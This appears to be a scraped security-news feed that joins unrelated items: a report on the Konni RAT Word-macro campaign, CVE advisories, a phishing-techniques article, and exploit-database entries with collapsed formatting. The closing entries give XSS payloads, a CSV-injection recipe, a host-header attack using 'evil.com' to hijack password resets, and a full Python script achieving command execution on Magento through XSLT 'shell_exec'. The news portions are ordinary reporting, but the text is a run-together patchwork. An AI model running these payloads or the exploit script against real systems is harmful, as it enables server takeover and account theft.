By Deeba Ahmed
Konni RAT is back!
This is a post from HackRead.com Read the original post: Konni RAT Exploiting Word Docs to Steal Data from Windows

The return of Konni RAT and latest findings should not come as a surprise, considering that, as of 2022, the Microsoft Office Suite remains the most exploited set of tools by hackers for spreading malware.

Cybersecurity researchers at FortiGuard Labs have discovered a new malware campaign dubbed ‘Konni,’ which targets Windows systems through Word documents containing malicious macros. When unsuspecting users open or download the document, a remote access trojan (RAT) called Konni is executed.

The Konni RAT is a sophisticated malware incorporating self-defence mechanisms, with capabilities that include stealing login credentials, remote command execution, and the ability to execute commands with elevated privileges. Additionally, it can download and upload files.

It is worth noting that the Konni RAT is known for its previous targeting of Russia. Notably, it was the same malware used against North Korea following its missile tests in August 2017.

As for the latest campaign, the malicious Word document is written in the Russian language, and distributed as a legitimate file, such as invoices, contracts, or job applications, to trick users into opening them.

The malicious email sent by threat actors (screenshit via: FortiGuard Labs)

Even though the document was created in September 2023, FortiGuard Labs’ internal telemetry shows that the campaign’s C2 server remains active. This means the campaign is ongoing, and new victims are being infected. This continuous activity shows the persistent nature of the Konni campaign.

Researchers observed that a ‘sophisticated threat actor’ has employed an advanced toolset within a Word document using ‘batch scripts and DLL files.’ The payload contains a UAC bypass encrypted communication with a C2 server, probably to allow the actor to execute privileged commands

Upon opening the Word document, a prompt requests the user to enable content, triggering a VBA script. This script initiates the download and execution of a ‘check.bat’ batch script. The ‘check.bat’ script conducts various checks, including verifying the presence of a remote connection session, identifying the Windows operating system version, and checking the system architecture.

Subsequently, the script executes the ‘wpns.dll’ library, bypassing UAC (User Account Control), and exploits the legitimate Windows utility ‘wusa.exe’ to launch a command with elevated privileges.

Afterwards, it runs the ‘netpp.bat’ batch script with inherited elevated privileges. The script stops the ‘netpp’ service, copies necessary files to the ‘System32’ directory, and creates a service named ‘netpp” that automatically starts at system startup. The malware begins execution after adding registry entries and starting the “netpp” service.

According to the FortiGuard Labs blog post, Konni RAT can extract information and execute commands on infected devices. Once installed, it lets attackers control the infected system remotely to steal sensitive data, deploy additional malware, or perform unauthorized activities.

The malware fetches a list of active processes on the system, and after performing compression and encryption, it sends the data to the C2 server. It also downloads a payload or command from the C2 server by sending an HTTP request. When it receives a response, it extracts and decrypts the data, stores it as a temporary file and executes the cmd command to expand the payload and initiate further actions.

The latest findings should not come as a surprise, considering that, as of 2022, the Microsoft Office Suite remains the most exploited set of tools by hackers for spreading malware.

The Konni campaign has been observed targeting individuals and organizations worldwide, particularly those in the Middle East and North Africa. To protect yourself from the Konni campaign and similar malware attacks, avoid opening email attachments from unknown senders or emails with suspicious subject lines.

Additionally, disable macros in Word documents and enable only when you know the document’s origin and purpose. Lastly, ensure your operating system and applications are updated to the latest versions to address known security vulnerabilities.

**_RELATED ARTICLES_**

1.  **LinkedIn Phishing Scam Steals Microsoft Accounts**
2.  **Hackers are digging into a 17 year old Microsoft Word flaw**
3.  **NodeStealer 2.0 Poses as ‘Microsoft’ to Hack Facebook Accounts**
4.  **Google, Microsoft and Oracle generated most vulnerabilities in 2021**
5.  **VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware**

Konni RAT Exploiting Word Docs to Steal Data from Windows

An uncontrolled search path element vulnerability has been found in the Duet Display product, affecting version 2.5.9.1. An attacker could place an arbitrary libusk.dll file in the C:\Users\user\AppData\Local\Microsoft\WindowsApps\ directory, which could lead to the execution and persistence of arbitrary code.

Affected Resources

Duet Display for Windows 10+, version 2.5.9.1.

Description

INCIBE has coordinated the publication of one vulnerabilitiy that affects Duet Display 2.5.9.1, a remote desktop application and screen mirroring, which has been discovered by Alexander Huamán Jaimes.

This vulnerabilitiy has been assigned the following code, CVSS v3.1 base score, CVSS vector string, and CWE vulnerability type:

*   CVE-2023-6235: CVSS v3.1: 7.8 | CVSS: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | CWE-427.

Solution

There is no reported solution at this time.

Detail

*   **CVE-2023-6235**: an uncontrolled search path element vulnerability has been found in the Duet Display product, affecting version 2.5.9.1. An attacker could place an arbitrary _libusk.dll_ file in the _C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\_ directory, which could lead to the execution and persistence of arbitrary code.

CVE-2023-6235: Arbitrary code execution in Duet Display

An Improper Validation of Integrity Check Value in Zscaler Client Connector on Windows allows an authenticated user to disable ZIA/ZPA by interrupting the service restart from Zscaler Diagnostics. This issue affects Client Connector: before 4.2.0.149.



CVE-2023-28802

Phishing attacks are steadily becoming more sophisticated, with cybercriminals investing in new ways of deceiving victims into revealing sensitive information or installing malicious software. One of the latest trends in phishing is the use of QR codes, CAPTCHAs, and steganography. See how they are carried out and learn to detect them.
Quishing
Quishing, a phishing technique resulting from the

Cybercrime / Malware Analysis

Phishing attacks are steadily becoming more sophisticated, with cybercriminals investing in new ways of deceiving victims into revealing sensitive information or installing malicious software. One of the latest trends in phishing is the use of QR codes, CAPTCHAs, and steganography. See how they are carried out and learn to detect them.

**Quishing**

Quishing, a phishing technique resulting from the combination of "QR" and "phishing," has become a popular weapon for cybercriminals in 2023.

By concealing malicious links within QR codes, attackers can evade traditional spam filters, which are primarily geared towards identifying text-based phishing attempts. The inability of many security tools to decipher the content of QR codes further makes this method a go-to choice for cybercriminals.

An email containing a QR code with a malicious link

Analyzing a QR code with an embedded malicious link in a safe environment is easy with ANY.RUN:

1.  Simply open this task in the sandbox (or upload your file with a QR code).
2.  Navigate to the Static Discovering section (By clicking on the name of the file in the top right corner).
3.  Select the object containing the QR code.
4.  Click "Submit to Analyze."

The sandbox will then automatically launch a new task window, allowing you to analyze the URL identified within the QR code.

Black Friday Offer

Take advantage of ANY.RUN's Black Friday Offer

Purchase an annual Searcher or Hunter plan subscription and get another for your colleague completely free of charge. Available November 20-26.

Get It Now

**CAPTCHA-based attacks**

CAPTCHA is a security solution used on websites to prevent automated bots from creating fake accounts or submitting spam. Attackers have managed to exploit this tool to their advantage.

A phishing attack CAPTCHA page shown in the ANY.RUN sandbox

Attackers are increasingly using CAPTCHAs to mask credential-harvesting forms on fake websites. By generating hundreds of domain names using a Randomized Domain Generated Algorithm (RDGA) and implementing CloudFlare's CAPTCHAs, they can effectively hide these forms from automated security systems, such as web crawlers, which are unable to bypass the CAPTCHAs.

A fake Halliburton login page

The example above shows an attack targeting Halliburton Corporation employees. It first requires the user to pass a CAPTCHA check and then uses a realistic Office 365 private login page that is difficult to distinguish from the real page.

Once the victim enters their login credentials, they are redirected to a legitimate website, while the attackers exfiltrate the credentials to their Command-and-Control server.

Learn more about CAPTCHA attacks in this article.

**Steganography malware campaigns**

Steganography is the practice of hiding data inside different media, such as images, videos, or other files.

A typical phishing attack that employs steganography begins with a carefully crafted email designed to appear legitimate. Embedded within the email is an attachment, often a Word document, accompanied by a link to a file-sharing platform like Dropbox. In the example below, you can see a fake email from a Colombian government organization.

A phishing email is typically the first stage of an attack

The unsuspecting user that clicks the link inside the document downloads an archive, which contains a VBS script file. Upon execution, the script retrieves an image file, seemingly harmless but containing hidden malicious code. Once executed, the malware infects the victim's system.

To understand how steganography attacks are carried out and detected, check out this article.

**Expose phishing attacks with ANY.RUN**

ANY.RUN is a malware analysis sandbox that is capable of detecting a wide range of phishing tactics and letting users examine them in detail.

Check out ANY.RUN's Black Friday Offer, available November 20-26.

The sandbox offers:

*   Fully interactive Windows 7,9,10,11 virtual machines
*   Comprehensive reports with IOCs and malware configs
*   Private analysis of an unlimited number of files and links

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

How Multi-Stage Phishing Attacks Exploit QRs, CAPTCHAs, and Steganography

Certain WithSecure products allow Local Privilege Escalation. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, and WithSecure Elements Endpoint Protection 17 and later.

On October 26, 2023, a high severity vulnerability was discovered in WithSecure Endpoint Protection solutions for Microsoft Windows. 

During investigation, we found that the affected component is used in the following WithSecure™ products:

*   WithSecure Client Security 15 onwards
    
*   WithSecure Server Security 15 onwards
    
*   WithSecure Email and Server Security 15 onwards
    
*   WithSecure Elements Endpoint Protection 17 onwards
    

This vulnerability allows for a local user with administrator privileges to corrupt kernel memory, leading to potential local privilege escalation.

WithSecure is not aware of any known exploits for this vulnerability.

We will update the advisory page as additional information becomes available.

CVE-2023-47172: CVE-2023-NNN4

PHPJabbers Availability Booking Calendar version 5.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: Multiple Cross Site Scripting in PHPJabbers AvailabilityBooking Calendar v5.0# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Orpon)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48208Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to MultipleStored Cross-Site Scripting (XSS) vulnerabilities in the "name,plugin_sms_api_key, plugin_sms_country_code, uuid, title, country name"parameters of index.php page.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any XSS Payload in "SMS API Key", "Default Country Code" inputfield and Save.4. You will see XSS pop up.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48208)

PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting

PHPJabbers Availability Booking Calendar version 5.0 suffers from a CSV injection vulnerability.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - CSVInjection# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48207Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to CSVinjection vulnerability which allows an attacker to execute remote code.The vulnerability exists due to insufficient input validation on the UniqueID field in the Reservations list that is used to construct a CSV file.Steps to Reproduce:1. Login your panel.2. Go to System Menu then click Language and go to Labels.3. Now use CSV Injection Payload in any field and go to Import/Export.4. Now click export and open your system.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48207)

PHPJabbers Availability Booking Calendar 5.0 CSV Injection

GaatiTrack Courier Management System version 1.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: GaatiTrack Courier Management System v1.0 - MultipleCross-site scripting# Date: 12/112023# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48206Description:Multiple reflected cross-site scripting (XSS) vulnerability exists inlogin.php, header.php page of GaatiTrack Courier Management System v1.0that allows attackers to execute arbitrary web scripts or HTML via acrafted payload injected into the Website login page parameter.Steps to Reproduce:1. Go to login and capture request data using burp suite. Your request datawill be:GET /gaatitrack/login.php HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: closeCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mpUpgrade-Insecure-Requests: 12. Now use XSS payload in login.php. So your request data will be:GET/gaatitrack/login.php?page=1</title><script>alert(document.domain)</script>HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: closeCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mpUpgrade-Insecure-Requests: 13. Forward You request data and check browser. You will be popup withdomain.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)

GaatiTrack Courier Management System 1.0 Cross Site Scripting

Jorani Leave Management System version 1.0.2 suffers from a host header injection vulnerability.

    # Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)# Vendor Homepage: https://jorani.org/# Software Link:https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip# Version: v1.0.2# Tested on: Windows 10, PHP version: 8.2.4, Apache/2.4.56# CVE: CVE-2023-48205Descriptions:A Host Header Injection vulnerability in Jorani Leave Management System1.0.2 may allow an attacker to spoof a particular header. This can beexploited by abusing password reset emails.Steps to Reproduce:1. Request:GET /jorani/session/login HTTP/1.1Host: 192.168.1.74Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/119.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Sec-GPC: 1Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;jorani_session=pqop598dtj85okrjvh043es6pqp1juagConnection: close2. Now change host name and check browser response. So your request datawill be:GET /jorani/session/login HTTP/1.1Host: evil.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/119.0.0.0 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Sec-GPC: 1Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brCookie: csrf_cookie_jorani=6ebb2e7eeb6867e2a83f96118ca6ecb3;jorani_session=pqop598dtj85okrjvh043es6pqp1juagConnection: close## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48205)

Jorani Leave Management System 1.0.2 Host Header Injection

FireBear Improved Import and Export version 3.8.6 for Magento 2.4.6 suffers from an XSLT server-side injection vulnerability that allows for command execution.

    Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6  - XSLT Server Side Injection Command Execution# Date: 2023-11-17# Exploit Author: tmrswrr# Vendor Homepage: https://commercemarketplace.adobe.com/# Software Link:  https://commercemarketplace.adobe.com/firebear-importexport.html# Version: FireBear ver. 3.8.6# Tested on: Magento 2.4.6Poc:https://github.com/capture0x/Magento-ver.-2.4.6/Exploit:import requestsfrom bs4 import BeautifulSoupimport reimport json import sysif len(sys.argv) != 3:    print("Usage: python exploit.py <base_url> <command>")    sys.exit(1)base_url = sys.argv[1]command = sys.argv[2]base_url = base_url.rstrip('/') + '/'login_page_url = base_url + "admin/"login_action_url = base_url + "admin/"import_job_edit_url = base_url + "import/job/edit/entity_id/21/" session = requests.Session() response = session.get(login_page_url)soup = BeautifulSoup(response.text, 'html.parser')form_key = soup.find('input', {'name': 'form_key'})['value']login_payload = {    'form_key': form_key,    'login[username]': 'demo',    'login[password]': '1q2w3e4r5t'} headers = {    'Content-Type': 'application/x-www-form-urlencoded',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'} login_response = session.post(login_action_url, headers=headers, data=login_payload) if login_response.ok and login_response.history:    print("Login successful!")    redirected_url = login_response.url    print("Redirected URL:", redirected_url)         import_job_edit_response = session.get(import_job_edit_url)    soup = BeautifulSoup(import_job_edit_response.text, 'html.parser')    second_form_key = soup.find('input', {'name': 'form_key'})['value']    print("Extracted Key")        key = re.findall(r'key\/(.*?)\/', login_response.url)[0]         second_post_url = f"{base_url}import/job/xslt/key/{key}/?isAjax=true"            second_post_payload = f"form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=xslt%2B%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0A%3Cxsl%3Astylesheet+version%3D%221.0%22%0Axmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22%0Axmlns%3Aphp%3D%22http%3A%2F%2Fphp.net%2Fxsl%22%3E%0A%3Cxsl%3Atemplate+match%3D%22%2F%22%3E%0A%3Cxsl%3Avalue-of+select%3D%22php%3Afunction('shell_exec'%2C'{command}')%22+%2F%3E%0A%3C%2Fxsl%3Atemplate%3E%0A%3C%2Fxsl%3Astylesheet%3E&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=host%2B&form_data%5B%5D=port%2B&form_data%5B%5D=username%2B&form_data%5B%5D=password%2B&form_data%5B%5D=type_file%2Bxml&form_data%5B%5D=import_source%2Bfile&form_data%5B%5D=file_upload%2B&form_data%5B%5D=predefined_structure%2B0&form_data%5B%5D=file_path%2Bpub%2Fmedia%2Fimportexport%2Fh%2Fe%2Fhello_39.xml&form_data%5B%5D=import_images_file_dir%2B&form_data%5B%5D=scan_directory%2B0&form_data%5B%5D=deferred_images%2B0&form_data%5B%5D=delete_file_after_import%2B0&form_data%5B%5D=archive_file_after_import%2B0&form_data%5B%5D=image_import_source%2B0&form_data%5B%5D=remove_current_mappings%2B0&form_data%5B%5D=associate_child_review_to_configurable_parent_product%2B0&form_data%5B%5D=associate_child_review_to_bundle_parent_product%2B0&form_key={second_form_key}"       second_post_headers = {        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',        'Referer': import_job_edit_response.url       }         second_post_response = session.post(second_post_url, headers=second_post_headers, data=second_post_payload)         if second_post_response.ok:        print("XSL Imported!")        response_json = json.loads(second_post_response.text)                result_xml = response_json.get("result", "")        if result_xml is not None:                     result_xml = result_xml.replace("<?xml version=\"1.0\"?>", "\n")                else:                      result_xml = "No Output found in the response."                print("Output:", result_xml)            else:        print("Import failed.")        print("Status Code:", second_post_response.status_code)        print("Response:", second_post_response.text)else:    print("Login failed.") session.close()

Tag

#windows